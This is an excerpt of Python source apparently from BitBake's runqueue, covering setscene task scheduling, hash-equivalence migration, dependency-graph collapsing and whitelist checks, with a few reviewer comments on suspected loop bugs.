                # If covered tasks are running, need to wait for them to complete
                # NOTE(review): this 'continue' only advances the *inner* loop,
                # so the check below is a no-op as written — presumably it was
                # meant to defer nexttask while its covered tasks are still
                # running; confirm intent against upstream.
                for t in self.sqdata.sq_covered_tasks[nexttask]:
                    if t in self.runq_running and t not in self.runq_complete:
                        continue
                # A deferred task only becomes runnable once the task it was
                # deferred behind completes and its hashes re-validate.
                if nexttask in self.sq_deferred:
                    if self.sq_deferred[nexttask] not in self.runq_complete:
                        continue
                    logger.debug(1, "Task %s no longer deferred" % nexttask)
                    del self.sq_deferred[nexttask]
                    valid = self.rq.validate_hashes(set([nexttask]), self.cooker.data, 0, False, summary=False)
                    if not valid:
                        logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask)
                        self.sq_task_failoutright(nexttask)
                        return True
                    else:
                        self.sqdata.outrightfail.remove(nexttask)
                if nexttask in self.sqdata.outrightfail:
                    # No sstate object exists for this task.
                    logger.debug(2, 'No package found, so skipping setscene task %s', nexttask)
                    self.sq_task_failoutright(nexttask)
                    return True
                if nexttask in self.sqdata.unskippable:
                    logger.debug(2, "Setscene task %s is unskippable" % nexttask)
                task = nexttask
                break
    if task is not None:
        # Dispatch the chosen setscene task to a worker.
        (mc, fn, taskname, taskfn) = split_tid_mcfn(task)
        taskname = taskname + "_setscene"
        if self.rq.check_stamp_task(task, taskname_from_tid(task), recurse = True, cache=self.stampcache):
            logger.debug(2, 'Stamp for underlying task %s is current, so skipping setscene variant', task)
            self.sq_task_failoutright(task)
            return True

        if self.cooker.configuration.force:
            # Forced targets must really run, never be accelerated.
            if task in self.rqdata.target_tids:
                self.sq_task_failoutright(task)
                return True

        if self.rq.check_stamp_task(task, taskname, cache=self.stampcache):
            logger.debug(2, 'Setscene stamp current task %s, so skip it and its dependencies', task)
            self.sq_task_skip(task)
            return True

        if self.cooker.configuration.skipsetscene:
            logger.debug(2, 'No setscene tasks should be executed. Skipping %s', task)
            self.sq_task_failoutright(task)
            return True

        startevent = sceneQueueTaskStarted(task, self.sq_stats, self.rq)
        bb.event.fire(startevent, self.cfgData)

        taskdepdata = self.sq_build_taskdepdata(task)

        taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
        taskhash = self.rqdata.get_task_hash(task)
        unihash = self.rqdata.get_task_unihash(task)
        # fakeroot tasks go to the fakeroot worker (started on demand).
        if 'fakeroot' in taskdep and taskname in taskdep['fakeroot'] and not self.cooker.configuration.dry_run:
            if not mc in self.rq.fakeworker:
                self.rq.start_fakeworker(self, mc)
            self.rq.fakeworker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, True, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, False)) + b"</runtask>")
            self.rq.fakeworker[mc].process.stdin.flush()
        else:
            self.rq.worker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, True, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, False)) + b"</runtask>")
            self.rq.worker[mc].process.stdin.flush()

        self.build_stamps[task] = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn, noextra=True)
        self.build_stamps2.append(self.build_stamps[task])
        self.sq_running.add(task)
        self.sq_live.add(task)
        self.sq_stats.taskActive()
        if self.can_start_task():
            return True

    self.update_holdofftasks()

    # All setscene activity drained: validate and close the setscene phase.
    if not self.sq_live and not self.sqdone and not self.sq_deferred and not self.updated_taskhash_queue and not self.holdoff_tasks:
        hashequiv_logger.verbose("Setscene tasks completed")

        err = self.summarise_scenequeue_errors()
        if err:
            self.rq.state = runQueueFailed
            return True

        if self.cooker.configuration.setsceneonly:
            self.rq.state = runQueueComplete
            return True
        self.sqdone = True

        if self.stats.total == 0:
            # nothing to do
            self.rq.state = runQueueComplete
            return True

    # Real-task dispatch.
    if self.cooker.configuration.setsceneonly:
        task = None
    else:
        task = self.sched.next()
    if task is not None:
        (mc, fn, taskname, taskfn) = split_tid_mcfn(task)

        if self.rqdata.setscenewhitelist is not None:
            if self.check_setscenewhitelist(task):
                self.task_fail(task, "setscene whitelist")
                return True

        if task in self.tasks_covered:
            logger.debug(2, "Setscene covered task %s", task)
            self.task_skip(task, "covered")
            return True

        if self.rq.check_stamp_task(task, taskname, cache=self.stampcache):
            logger.debug(2, "Stamp current task %s", task)

            self.task_skip(task, "existing")
            self.runq_tasksrun.add(task)
            return True

        taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
        if 'noexec' in taskdep and taskname in taskdep['noexec']:
            # noexec tasks complete immediately; only make a stamp when
            # actually building.
            startevent = runQueueTaskStarted(task, self.stats, self.rq,
                                             noexec=True)
            bb.event.fire(startevent, self.cfgData)
            self.runq_running.add(task)
            self.stats.taskActive()
            if not (self.cooker.configuration.dry_run or self.rqdata.setscene_enforce):
                bb.build.make_stamp(taskname, self.rqdata.dataCaches[mc], taskfn)
            self.task_complete(task)
            return True
        else:
            startevent = runQueueTaskStarted(task, self.stats, self.rq)
            bb.event.fire(startevent, self.cfgData)

            taskdepdata = self.build_taskdepdata(task)

            taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
            taskhash = self.rqdata.get_task_hash(task)
            unihash = self.rqdata.get_task_unihash(task)
            if 'fakeroot' in taskdep and taskname in taskdep['fakeroot'] and not (self.cooker.configuration.dry_run or self.rqdata.setscene_enforce):
                if not mc in self.rq.fakeworker:
                    try:
                        self.rq.start_fakeworker(self, mc)
                    except OSError as exc:
                        logger.critical("Failed to spawn fakeroot worker to run %s: %s" % (task, str(exc)))
                        self.rq.state = runQueueFailed
                        self.stats.taskFailed()
                        return True
                self.rq.fakeworker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, False, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, self.rqdata.setscene_enforce)) + b"</runtask>")
                self.rq.fakeworker[mc].process.stdin.flush()
            else:
                self.rq.worker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, False, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, self.rqdata.setscene_enforce)) + b"</runtask>")
                self.rq.worker[mc].process.stdin.flush()

            self.build_stamps[task] = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn, noextra=True)
            self.build_stamps2.append(self.build_stamps[task])
            self.runq_running.add(task)
            self.stats.taskActive()
            if self.can_start_task():
                return True

    if self.stats.active > 0 or self.sq_stats.active > 0:
        self.rq.read_workers()
        return self.rq.active_fds()

    # No more tasks can be run. If we have deferred setscene tasks we should run them.
    if self.sq_deferred:
        tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0])
        logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid)
        self.sq_task_failoutright(tid)
        return True

    if len(self.failed_tids) != 0:
        self.rq.state = runQueueFailed
        return True

    # Sanity Checks
    err = self.summarise_scenequeue_errors()
    for task in self.rqdata.runtaskentries:
        if task not in self.runq_buildable:
            logger.error("Task %s never buildable!", task)
            err = True
        elif task not in self.runq_running:
            logger.error("Task %s never ran!", task)
            err = True
        elif task not in self.runq_complete:
            logger.error("Task %s never completed!", task)
            err = True

    if err:
        self.rq.state = runQueueFailed
    else:
        self.rq.state = runQueueComplete

    return True
def filtermcdeps(self, task, mc, deps):
    """Return the subset of *deps* belonging to multiconfig *mc*."""
    return {dep for dep in deps if mc_from_tid(dep) == mc}
# We filter out multiconfig dependencies from taskdepdata we pass to the tasks
# as most code can't handle them
def build_taskdepdata(self, task):
    """
    Flatten the dependency graph rooted at *task* into the taskdepdata
    mapping handed to the worker: tid -> [pn, taskname, fn, deps,
    provides, taskhash, unihash]. Cross-multiconfig dependencies are
    filtered out.
    """
    taskdepdata = {}
    mc = mc_from_tid(task)
    frontier = self.rqdata.runtaskentries[task].depends.copy()
    frontier.add(task)
    frontier = self.filtermcdeps(task, mc, frontier)
    while frontier:
        pending = []
        for tid in frontier:
            (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
            entry = self.rqdata.runtaskentries[tid]
            deps = self.filtermcdeps(task, mc, entry.depends)
            taskdepdata[tid] = [self.rqdata.dataCaches[mc].pkg_fn[taskfn],
                                taskname,
                                fn,
                                deps,
                                self.rqdata.dataCaches[mc].fn_provides[taskfn],
                                entry.hash,
                                entry.unihash]
            pending.extend(d for d in deps if d not in taskdepdata)
        frontier = pending
    #bb.note("Task %s: " % task + str(taskdepdata).replace("], ", "],\n"))
    return taskdepdata
def update_holdofftasks(self):
    """
    Recompute tasks_covered / tasks_notcovered and the holdoff set from
    the current scenequeue coverage state. No-op unless flagged dirty
    via holdoff_need_update.
    """
    if not self.holdoff_need_update:
        return

    notcovered = set(self.scenequeue_notcovered) | self.cantskip
    for tid in self.scenequeue_notcovered:
        notcovered |= self.sqdata.sq_covered_tasks[tid]
    notcovered |= self.sqdata.unskippable.difference(self.rqdata.runq_setscene_tids)
    notcovered.intersection_update(self.tasks_scenequeue_done)

    covered = set(self.scenequeue_covered)
    for tid in self.scenequeue_covered:
        covered |= self.sqdata.sq_covered_tasks[tid]
    covered.difference_update(notcovered)
    covered.intersection_update(self.tasks_scenequeue_done)

    # Promote any decided task whose dependencies are already satisfied.
    for tid in notcovered | covered:
        deps = self.rqdata.runtaskentries[tid].depends
        if not deps or deps.issubset(self.runq_complete):
            self.setbuildable(tid)

    self.tasks_covered = covered
    self.tasks_notcovered = notcovered

    # Hold off setscene tasks with undecided coverage, plus any of their
    # covered tasks that haven't completed yet.
    self.holdoff_tasks = set()
    for tid in self.rqdata.runq_setscene_tids:
        if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
            self.holdoff_tasks.add(tid)
    for tid in self.holdoff_tasks.copy():
        for dep in self.sqdata.sq_covered_tasks[tid]:
            if dep not in self.runq_complete:
                self.holdoff_tasks.add(dep)

    self.holdoff_need_update = False
def process_possible_migrations(self):
    """
    Apply queued unihash updates and migrate the affected tasks.

    Drains self.updated_taskhash_queue (skipping tasks still running),
    recomputes the task/unihashes of everything that depends on a
    changed task in dependency order, notifies the workers of the new
    hashes, and resets the scenequeue state of any changed setscene
    tasks so they are re-evaluated.
    """
    changed = set()
    toprocess = set()
    for tid, unihash in self.updated_taskhash_queue.copy():
        # Can't apply an update while the task is mid-flight; leave it
        # queued for a later call.
        if tid in self.runq_running and tid not in self.runq_complete:
            continue

        self.updated_taskhash_queue.remove((tid, unihash))

        if unihash != self.rqdata.runtaskentries[tid].unihash:
            hashequiv_logger.verbose("Task %s unihash changed to %s" % (tid, unihash))
            self.rqdata.runtaskentries[tid].unihash = unihash
            bb.parse.siggen.set_unihash(tid, unihash)
            toprocess.add(tid)

    # Work out all tasks which depend upon these
    total = set()
    next = set()
    for p in toprocess:
        next |= self.rqdata.runtaskentries[p].revdeps
    while next:
        current = next.copy()
        total = total | next
        next = set()
        for ntid in current:
            next |= self.rqdata.runtaskentries[ntid].revdeps
            next.difference_update(total)

    # Now iterate those tasks in dependency order to regenerate their taskhash/unihash
    next = set()
    for p in total:
        if len(self.rqdata.runtaskentries[p].depends) == 0:
            next.add(p)
        elif self.rqdata.runtaskentries[p].depends.isdisjoint(total):
            next.add(p)

    # When an item doesn't have dependencies in total, we can process it. Drop items from total when handled
    while next:
        current = next.copy()
        next = set()
        for tid in current:
            # BUGFIX: this previously inspected runtaskentries[p] — a stale
            # loop variable left over from the seeding loop above — so the
            # "dependencies still pending" guard examined the wrong task.
            # It must look at tid itself.
            if len(self.rqdata.runtaskentries[tid].depends) and not self.rqdata.runtaskentries[tid].depends.isdisjoint(total):
                continue
            orighash = self.rqdata.runtaskentries[tid].hash
            dc = bb.parse.siggen.get_data_caches(self.rqdata.dataCaches, mc_from_tid(tid))
            newhash = bb.parse.siggen.get_taskhash(tid, self.rqdata.runtaskentries[tid].depends, dc)
            origuni = self.rqdata.runtaskentries[tid].unihash
            newuni = bb.parse.siggen.get_unihash(tid)
            # FIXME, need to check it can come from sstate at all for determinism?
            remapped = False
            if newuni == origuni:
                # Nothing to do, we match, skip code below
                remapped = True
            elif tid in self.scenequeue_covered or tid in self.sq_live:
                # Already ran this setscene task or it running. Report the new taskhash
                bb.parse.siggen.report_unihash_equiv(tid, newhash, origuni, newuni, self.rqdata.dataCaches)
                hashequiv_logger.verbose("Already covered setscene for %s so ignoring rehash (remap)" % (tid))
                remapped = True

            if not remapped:
                #logger.debug(1, "Task %s hash changes: %s->%s %s->%s" % (tid, orighash, newhash, origuni, newuni))
                self.rqdata.runtaskentries[tid].hash = newhash
                self.rqdata.runtaskentries[tid].unihash = newuni
                changed.add(tid)

            next |= self.rqdata.runtaskentries[tid].revdeps
            total.remove(tid)
            next.intersection_update(total)

    if changed:
        # Push the regenerated hashes to all workers.
        for mc in self.rq.worker:
            self.rq.worker[mc].process.stdin.write(b"<newtaskhashes>" + pickle.dumps(bb.parse.siggen.get_taskhashes()) + b"</newtaskhashes>")
        for mc in self.rq.fakeworker:
            self.rq.fakeworker[mc].process.stdin.write(b"<newtaskhashes>" + pickle.dumps(bb.parse.siggen.get_taskhashes()) + b"</newtaskhashes>")

        hashequiv_logger.debug(1, pprint.pformat("Tasks changed:\n%s" % (changed)))

    # Changed setscene tasks become pending migrations.
    for tid in changed:
        if tid not in self.rqdata.runq_setscene_tids:
            continue
        if tid not in self.pending_migrations:
            self.pending_migrations.add(tid)

    update_tasks = []
    for tid in self.pending_migrations.copy():
        if tid in self.runq_running or tid in self.sq_live:
            # Too late, task already running, not much we can do now
            self.pending_migrations.remove(tid)
            continue

        valid = True
        # Check no tasks this covers are running
        for dep in self.sqdata.sq_covered_tasks[tid]:
            if dep in self.runq_running and dep not in self.runq_complete:
                hashequiv_logger.debug(2, "Task %s is running which blocks setscene for %s from running" % (dep, tid))
                valid = False
                break
        if not valid:
            continue

        self.pending_migrations.remove(tid)
        changed = True

        # Reset this setscene task's state so it gets re-evaluated.
        if tid in self.tasks_scenequeue_done:
            self.tasks_scenequeue_done.remove(tid)
        for dep in self.sqdata.sq_covered_tasks[tid]:
            if dep in self.runq_complete and dep not in self.runq_tasksrun:
                bb.error("Task %s marked as completed but now needing to rerun? Aborting build." % dep)
                self.failed_tids.append(tid)
                self.rq.state = runQueueCleanUp
                return

            if dep not in self.runq_complete:
                if dep in self.tasks_scenequeue_done and dep not in self.sqdata.unskippable:
                    self.tasks_scenequeue_done.remove(dep)

        if tid in self.sq_buildable:
            self.sq_buildable.remove(tid)
        if tid in self.sq_running:
            self.sq_running.remove(tid)
        harddepfail = False
        for t in self.sqdata.sq_harddeps:
            if tid in self.sqdata.sq_harddeps[t] and t in self.scenequeue_notcovered:
                harddepfail = True
                break
        if not harddepfail and self.sqdata.sq_revdeps[tid].issubset(self.scenequeue_covered | self.scenequeue_notcovered):
            if tid not in self.sq_buildable:
                self.sq_buildable.add(tid)
        if len(self.sqdata.sq_revdeps[tid]) == 0:
            self.sq_buildable.add(tid)

        if tid in self.sqdata.outrightfail:
            self.sqdata.outrightfail.remove(tid)
        if tid in self.scenequeue_notcovered:
            self.scenequeue_notcovered.remove(tid)
        if tid in self.scenequeue_covered:
            self.scenequeue_covered.remove(tid)
        if tid in self.scenequeue_notneeded:
            self.scenequeue_notneeded.remove(tid)

        (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
        self.sqdata.stamps[tid] = bb.build.stampfile(taskname + "_setscene", self.rqdata.dataCaches[mc], taskfn, noextra=True)

        if tid in self.stampcache:
            del self.stampcache[tid]

        if tid in self.build_stamps:
            del self.build_stamps[tid]

        update_tasks.append((tid, harddepfail, tid in self.sqdata.valid))

    if update_tasks:
        self.sqdone = False
        update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)

    for (tid, harddepfail, origvalid) in update_tasks:
        if tid in self.sqdata.valid and not origvalid:
            hashequiv_logger.verbose("Setscene task %s became valid" % tid)
        if harddepfail:
            self.sq_task_failoutright(tid)

    if changed:
        self.holdoff_need_update = True
def scenequeue_updatecounters(self, task, fail=False):
    """
    Propagate the outcome of setscene *task* to dependent setscene
    tasks, then walk down the dependency chain marking non-setscene
    tasks whose reverse dependencies have all been handled as done.
    """
    for dep in sorted(self.sqdata.sq_deps[task]):
        if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]:
            # A failed hard dependency means the dependent can't succeed.
            logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep))
            self.sq_task_failoutright(dep)
            continue
        if self.sqdata.sq_revdeps[dep].issubset(self.scenequeue_covered | self.scenequeue_notcovered):
            if dep not in self.sq_buildable:
                self.sq_buildable.add(dep)

    frontier = {task}
    while frontier:
        upcoming = set()
        for t in sorted(frontier):
            self.tasks_scenequeue_done.add(t)
            # Look down the dependency chain for non-setscene things which
            # this task depends on and mark them as 'done' too.
            for dep in self.rqdata.runtaskentries[t].depends:
                if dep in self.rqdata.runq_setscene_tids or dep in self.tasks_scenequeue_done:
                    continue
                if self.rqdata.runtaskentries[dep].revdeps.issubset(self.tasks_scenequeue_done):
                    upcoming.add(dep)
        frontier = upcoming

    self.holdoff_need_update = True
def sq_task_completeoutright(self, task):
    """
    Mark a setscene task as covered (successfully accelerated).
    Look at the reverse dependencies and mark any task with
    completed dependencies as buildable.
    """
    logger.debug(1, 'Found task %s which could be accelerated', task)
    self.scenequeue_covered.add(task)
    self.scenequeue_updatecounters(task)
def sq_check_taskfail(self, task):
    """
    After a setscene failure, abort the build if the setscene-enforce
    whitelist says this task's output had to come from setscene.
    """
    if self.rqdata.setscenewhitelist is None:
        return
    realtask = task.split('_setscene')[0]
    (mc, fn, taskname, taskfn) = split_tid_mcfn(realtask)
    pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
    if not check_setscene_enforce_whitelist(pn, taskname, self.rqdata.setscenewhitelist):
        logger.error('Task %s.%s failed' % (pn, taskname + "_setscene"))
        self.rq.state = runQueueCleanUp
def sq_task_complete(self, task):
    """Handle successful completion of a setscene task."""
    self.sq_stats.taskCompleted()
    event = sceneQueueTaskCompleted(task, self.sq_stats, self.rq)
    bb.event.fire(event, self.cfgData)
    self.sq_task_completeoutright(task)
def sq_task_fail(self, task, result):
    """Handle a setscene task failure: record, propagate, police whitelist."""
    self.sq_stats.taskFailed()
    event = sceneQueueTaskFailed(task, self.sq_stats, result, self)
    bb.event.fire(event, self.cfgData)
    self.scenequeue_notcovered.add(task)
    self.scenequeue_updatecounters(task, True)
    self.sq_check_taskfail(task)
def sq_task_failoutright(self, task):
    """
    Mark a setscene task as not covered without running it (e.g. no
    sstate object available) and propagate that to its dependents.
    """
    self.sq_running.add(task)
    self.sq_buildable.add(task)
    self.sq_stats.taskSkipped()
    self.sq_stats.taskCompleted()
    self.scenequeue_notcovered.add(task)
    self.scenequeue_updatecounters(task, True)
def sq_task_skip(self, task):
    """Skip a setscene task whose output is already present, marking it covered."""
    self.sq_running.add(task)
    self.sq_buildable.add(task)
    self.sq_task_completeoutright(task)
    self.sq_stats.taskSkipped()
    self.sq_stats.taskCompleted()
def sq_build_taskdepdata(self, task):
    """
    Build the taskdepdata mapping for a setscene task from its explicit
    inter-setscene idepends: tid -> [pn, taskname, fn, deps, provides,
    taskhash, unihash].
    """
    def getsetscenedeps(tid):
        """Resolve the _setscene idepends of *tid* to real task ids."""
        deps = set()
        (mc, fn, taskname, _) = split_tid_mcfn(tid)
        realtid = tid + "_setscene"
        idepends = self.rqdata.taskData[mc].taskentries[realtid].idepends
        for (depname, idependtask) in idepends:
            if depname not in self.rqdata.taskData[mc].build_targets:
                continue
            depfn = self.rqdata.taskData[mc].build_targets[depname][0]
            if depfn is None:
                continue
            deps.add(depfn + ":" + idependtask.replace("_setscene", ""))
        return deps

    taskdepdata = {}
    frontier = getsetscenedeps(task)
    frontier.add(task)
    while frontier:
        pending = []
        for tid in frontier:
            (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
            deps = getsetscenedeps(tid)
            entry = self.rqdata.runtaskentries[tid]
            taskdepdata[tid] = [self.rqdata.dataCaches[mc].pkg_fn[taskfn],
                                taskname,
                                fn,
                                deps,
                                self.rqdata.dataCaches[mc].fn_provides[taskfn],
                                entry.hash,
                                entry.unihash]
            pending.extend(d for d in deps if d not in taskdepdata)
        frontier = pending
    #bb.note("Task %s: " % task + str(taskdepdata).replace("], ", "],\n"))
    return taskdepdata
def check_setscenewhitelist(self, tid):
    """
    Return True when *tid* is about to execute even though the
    setscene-enforce whitelist says its output should have come from
    setscene — i.e. this execution is unexpected.
    """
    (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)

    # Covered tasks are fine to run.
    if tid in self.tasks_covered:
        return False
    # So are tasks with a current stamp...
    if self.rq.check_stamp_task(tid, taskname, cache=self.stampcache):
        return False
    # ...and noexec tasks.
    taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
    if 'noexec' in taskdep and taskname in taskdep['noexec']:
        return False

    pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
    if check_setscene_enforce_whitelist(pn, taskname, self.rqdata.setscenewhitelist):
        return False

    if tid in self.rqdata.runq_setscene_tids:
        msg = 'Task %s.%s attempted to execute unexpectedly and should have been setscened' % (pn, taskname)
    else:
        msg = 'Task %s.%s attempted to execute unexpectedly' % (pn, taskname)
    for t in self.scenequeue_notcovered:
        msg = msg + "\nTask %s, unihash %s, taskhash %s" % (t, self.rqdata.runtaskentries[t].unihash, self.rqdata.runtaskentries[t].hash)
    logger.error(msg + '\nThis is usually due to missing setscene tasks. Those missing in this build were: %s' % pprint.pformat(self.scenequeue_notcovered))
    return True
class SQData(object):
    """
    Aggregated state for the scenequeue (setscene) portion of a build.
    Populated by build_scenequeue_data()/update_scenequeue_data().
    """
    def __init__(self):
        # Forward dependencies between setscene tasks
        self.sq_deps = {}
        # Reverse dependencies between setscene tasks
        self.sq_revdeps = {}
        # Injected inter-setscene task dependencies
        self.sq_harddeps = {}
        # Cache of stamp files so duplicates can't run in parallel
        self.stamps = {}
        # Setscene tasks directly depended upon by the build
        self.unskippable = set()
        # List of setscene tasks which aren't present
        self.outrightfail = set()
        # A list of normal tasks a setscene task covers
        self.sq_covered_tasks = {}
def build_scenequeue_data(sqdata, rqdata, rq, cooker, stampcache, sqrq):
    """
    Populate *sqdata* with the collapsed setscene dependency graph.

    Squashes the full runqueue dependency tree down to dependencies
    between setscene tasks only, records which real tasks each setscene
    task covers, computes the "unskippable" set, resolves explicit
    inter-setscene idepends, and finally seeds availability state by
    calling update_scenequeue_data().
    """
    sq_revdeps = {}
    sq_revdeps_squash = {}
    sq_collated_deps = {}

    # We need to construct a dependency graph for the setscene functions. Intermediate
    # dependencies between the setscene tasks only complicate the code. This code
    # therefore aims to collapse the huge runqueue dependency tree into a smaller one
    # only containing the setscene functions.

    rqdata.init_progress_reporter.next_stage()

    # First process the chains up to the first setscene task.
    endpoints = {}
    for tid in rqdata.runtaskentries:
        sq_revdeps[tid] = copy.copy(rqdata.runtaskentries[tid].revdeps)
        sq_revdeps_squash[tid] = set()
        if (len(sq_revdeps[tid]) == 0) and tid not in rqdata.runq_setscene_tids:
            #bb.warn("Added endpoint %s" % (tid))
            endpoints[tid] = set()

    rqdata.init_progress_reporter.next_stage()

    # Secondly process the chains between setscene tasks.
    for tid in rqdata.runq_setscene_tids:
        sq_collated_deps[tid] = set()
        #bb.warn("Added endpoint 2 %s" % (tid))
        for dep in rqdata.runtaskentries[tid].depends:
            if tid in sq_revdeps[dep]:
                sq_revdeps[dep].remove(tid)
            if dep not in endpoints:
                endpoints[dep] = set()
            #bb.warn(" Added endpoint 3 %s" % (dep))
            endpoints[dep].add(tid)

    rqdata.init_progress_reporter.next_stage()

    def process_endpoints(endpoints):
        # Recursively peel endpoints off the graph, pushing the set of
        # setscene tasks that cover each point down onto its dependencies.
        newendpoints = {}
        for point, task in endpoints.items():
            tasks = set()
            if task:
                tasks |= task
            if sq_revdeps_squash[point]:
                tasks |= sq_revdeps_squash[point]
            if point not in rqdata.runq_setscene_tids:
                # Record that each covering setscene task covers this point.
                for t in tasks:
                    sq_collated_deps[t].add(point)
            sq_revdeps_squash[point] = set()
            if point in rqdata.runq_setscene_tids:
                # Setscene tasks absorb the accumulated coverage and stop
                # further propagation along this chain.
                sq_revdeps_squash[point] = tasks
                tasks = set()
                continue
            for dep in rqdata.runtaskentries[point].depends:
                if point in sq_revdeps[dep]:
                    sq_revdeps[dep].remove(point)
                if tasks:
                    sq_revdeps_squash[dep] |= tasks
                if len(sq_revdeps[dep]) == 0 and dep not in rqdata.runq_setscene_tids:
                    newendpoints[dep] = task
        if len(newendpoints) != 0:
            process_endpoints(newendpoints)

    process_endpoints(endpoints)

    rqdata.init_progress_reporter.next_stage()

    # Build a list of tasks which are "unskippable"
    # These are direct endpoints referenced by the build upto and including setscene tasks
    # Take the build endpoints (no revdeps) and find the sstate tasks they depend upon
    new = True
    for tid in rqdata.runtaskentries:
        if len(rqdata.runtaskentries[tid].revdeps) == 0:
            sqdata.unskippable.add(tid)
    sqdata.unskippable |= sqrq.cantskip
    while new:
        new = False
        orig = sqdata.unskippable.copy()
        for tid in sorted(orig, reverse=True):
            if tid in rqdata.runq_setscene_tids:
                continue
            if len(rqdata.runtaskentries[tid].depends) == 0:
                # These are tasks which have no setscene tasks in their chain, need to mark as directly buildable
                sqrq.setbuildable(tid)
            sqdata.unskippable |= rqdata.runtaskentries[tid].depends
        if sqdata.unskippable != orig:
            new = True

    sqrq.tasks_scenequeue_done |= sqdata.unskippable.difference(rqdata.runq_setscene_tids)

    rqdata.init_progress_reporter.next_stage(len(rqdata.runtaskentries))

    # Sanity check all dependencies could be changed to setscene task references
    for taskcounter, tid in enumerate(rqdata.runtaskentries):
        if tid in rqdata.runq_setscene_tids:
            pass
        elif len(sq_revdeps_squash[tid]) != 0:
            bb.msg.fatal("RunQueue", "Something went badly wrong during scenequeue generation, aborting. Please report this problem.")
        else:
            del sq_revdeps_squash[tid]
        rqdata.init_progress_reporter.update(taskcounter)

    rqdata.init_progress_reporter.next_stage()

    # Resolve setscene inter-task dependencies
    # e.g. do_sometask_setscene[depends] = "targetname:do_someothertask_setscene"
    # Note that anything explicitly depended upon will have its reverse dependencies removed to avoid circular dependencies
    for tid in rqdata.runq_setscene_tids:
        (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
        realtid = tid + "_setscene"
        idepends = rqdata.taskData[mc].taskentries[realtid].idepends
        sqdata.stamps[tid] = bb.build.stampfile(taskname + "_setscene", rqdata.dataCaches[mc], taskfn, noextra=True)
        for (depname, idependtask) in idepends:
            if depname not in rqdata.taskData[mc].build_targets:
                continue

            depfn = rqdata.taskData[mc].build_targets[depname][0]
            if depfn is None:
                continue
            deptid = depfn + ":" + idependtask.replace("_setscene", "")
            if deptid not in rqdata.runtaskentries:
                bb.msg.fatal("RunQueue", "Task %s depends upon non-existent task %s:%s" % (realtid, depfn, idependtask))

            if not deptid in sqdata.sq_harddeps:
                sqdata.sq_harddeps[deptid] = set()
            sqdata.sq_harddeps[deptid].add(tid)

            sq_revdeps_squash[tid].add(deptid)
            # Have to zero this to avoid circular dependencies
            sq_revdeps_squash[deptid] = set()

    rqdata.init_progress_reporter.next_stage()

    for task in sqdata.sq_harddeps:
        for dep in sqdata.sq_harddeps[task]:
            sq_revdeps_squash[dep].add(task)

    rqdata.init_progress_reporter.next_stage()

    #for tid in sq_revdeps_squash:
    #    data = ""
    #    for dep in sq_revdeps_squash[tid]:
    #        data = data + "\n %s" % dep
    #    bb.warn("Task %s_setscene: is %s " % (tid, data))

    sqdata.sq_revdeps = sq_revdeps_squash
    sqdata.sq_covered_tasks = sq_collated_deps

    # Build reverse version of revdeps to populate deps structure
    for tid in sqdata.sq_revdeps:
        sqdata.sq_deps[tid] = set()
    for tid in sqdata.sq_revdeps:
        for dep in sqdata.sq_revdeps[tid]:
            sqdata.sq_deps[dep].add(tid)

    rqdata.init_progress_reporter.next_stage()

    sqdata.multiconfigs = set()
    for tid in sqdata.sq_revdeps:
        sqdata.multiconfigs.add(mc_from_tid(tid))
        # Tasks with no setscene reverse deps are immediately buildable.
        if len(sqdata.sq_revdeps[tid]) == 0:
            sqrq.sq_buildable.add(tid)

    rqdata.init_progress_reporter.finish()

    sqdata.noexec = set()
    sqdata.stamppresent = set()
    sqdata.valid = set()

    update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True)
def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True):
    """
    Refresh the scenequeue bookkeeping for the given task ids.

    For each tid, classify it as noexec / stamp-present / needing a hash
    validity check, then validate the remaining hashes in one batch and
    mark unvalidated, uncovered tasks as outright failures.  Tasks whose
    pending hash collides with an earlier task are deferred behind it.

    Mutates sqdata (stamppresent, valid, noexec, hashes, outrightfail)
    and sqrq (skip/deferred state) in place; returns None.
    """
    tocheck = set()

    for tid in sorted(tids):
        # Reset any stale classification from a previous call.
        if tid in sqdata.stamppresent:
            sqdata.stamppresent.remove(tid)
        if tid in sqdata.valid:
            sqdata.valid.remove(tid)

        (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)

        taskdep = rqdata.dataCaches[mc].task_deps[taskfn]

        if 'noexec' in taskdep and taskname in taskdep['noexec']:
            # noexec tasks never run; stamp them and skip straight away.
            sqdata.noexec.add(tid)
            sqrq.sq_task_skip(tid)
            bb.build.make_stamp(taskname + "_setscene", rqdata.dataCaches[mc], taskfn)
            continue

        if rq.check_stamp_task(tid, taskname + "_setscene", cache=stampcache):
            logger.debug(2, 'Setscene stamp current for task %s', tid)
            sqdata.stamppresent.add(tid)
            sqrq.sq_task_skip(tid)
            continue

